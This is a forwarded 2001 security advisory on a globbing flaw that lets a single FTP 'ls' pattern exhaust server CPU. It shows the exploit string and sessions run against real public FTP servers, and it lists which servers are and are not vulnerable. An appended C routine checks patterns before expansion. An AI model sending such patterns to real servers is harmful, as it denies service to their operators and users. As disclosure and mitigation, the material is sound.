Multiple vendors FTP denial of service (fwd)

From: Attila Nagy (bra@fsn.hu)
Date: 03/15/01


Date: Thu, 15 Mar 2001 21:21:16 +0100 (CET)
From: Attila Nagy <bra@fsn.hu>
To: <freebsd-security@FreeBSD.ORG>


FreeBSD isn't listed, but is also vulnerable, at least with the FTPd in
-STABLE.

---------- Forwarded message ----------
Date: Thu, 15 Mar 2001 09:34:09 +0100
From: "Frank DENIS (Jedi/Sector One)" <j@4U.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Multiple vendors FTP denial of service

- Proftpd built-in 'ls' command has a globbing bug that allows remote
denial-of-service.

  Here's a simple exploit, tested on the Proftpd site :

$ ftp ftp.proftpd.org
...
Name (ftp.proftpd.org:j): ftp
...
230 Anonymous access granted, restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
227 Entering Passive Mode (216,10,40,219,4,111).
421 Service not available, remote server timed out. Connection closed

  That command takes 100% CPU time on the server. It can lead to an easy
DOS even if few remote simultaneous connections are allowed.

  Other FTP servers may be concerned as well. Here are various tries :

- NetBSD FTP showed the same behavior as Proftpd :

ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 EPRT command successful.
(long delay)
421 Service not available, remote server timed out. Connection closed

So NetBSD-ftpd 20000723a may also consume 100% cpu time, resulting in a
possible DOS. Other BSD FTP may be affected as well.

- Microsoft FTP Service (Version 5.0) also seems confused by the command :

ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
500 'EPSV': command not understood
227 Entering Passive Mode (207,46,133,140,4,223).
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
(very long delay... nothing happens...)

- Publicfile refuses the command :

ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
227 =131,193,178,181,97,222
550 Sorry, I can't open that file: file does not exist.

- Wu-FTPd 2.6.1 is not vulnerable. Only the result of 'ls *' is computed and
displayed.

- PureFTPd (any version) is not vulnerable. Result is "Simplified wildcard
expression to *" and the 'ls *' output.

  Maintainers of vulnerable servers have been warned of this bug.

--
  -=- Frank DENIS aka Jedi/Sector One < spam@jedi.claranet.fr > -=-
		LINAGORA SA (Paris, France) : http://www.linagora.com
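
A pre-expansion check in the spirit of the servers the report lists as not vulnerable (Publicfile refuses the command, PureFTPd simplifies the expression), added here as an example and not taken from the original posts or from any of these servers' code. The function name and both limits are assumptions chosen for illustration.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Assumed policy limits for this example; tune per deployment. */
#define MAX_PATTERN_LEN         256
#define MAX_WILDCARD_COMPONENTS 3

/* True if the path component s[0..len) contains a glob metacharacter. */
static bool has_wildcard(const char *s, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (strchr("*?[{", s[i]) != NULL)
            return true;
    return false;
}

/*
 * Hypothetical pre-glob check for a client-supplied LIST/NLST argument.
 * Each wildcard component is expanded against every match of the previous
 * one, so "*" followed by ".." followed by "*" multiplies the work at each
 * repetition. Refuse ".." after a wildcard and cap wildcard components.
 */
bool list_pattern_allowed(const char *pattern)
{
    size_t wild = 0;

    if (strlen(pattern) > MAX_PATTERN_LEN)
        return false;
    for (const char *p = pattern; *p != '\0'; ) {
        size_t len = strcspn(p, "/");          /* length of this component */
        if (len == 2 && p[0] == '.' && p[1] == '.') {
            if (wild > 0)                      /* ".." after a wildcard */
                return false;
        } else if (has_wildcard(p, len)) {
            if (++wild > MAX_WILDCARD_COMPONENTS)
                return false;
        }
        p += len;
        p += strspn(p, "/");                   /* skip separator(s) */
    }
    return true;
}

int main(void)
{
    /* Constructed inputs; the second is the shape used in the report. */
    const char *samples[] = { "pub/*.tar.gz", "*/../*/../*", "*/*/*/*" };
    for (size_t i = 0; i < 3; i++)
        printf("%-14s %s\n", samples[i],
               list_pattern_allowed(samples[i]) ? "allow" : "refuse");
    return 0;
}
```

A server would call such a check before handing the argument to its globbing routine and answer with an error reply when it returns false.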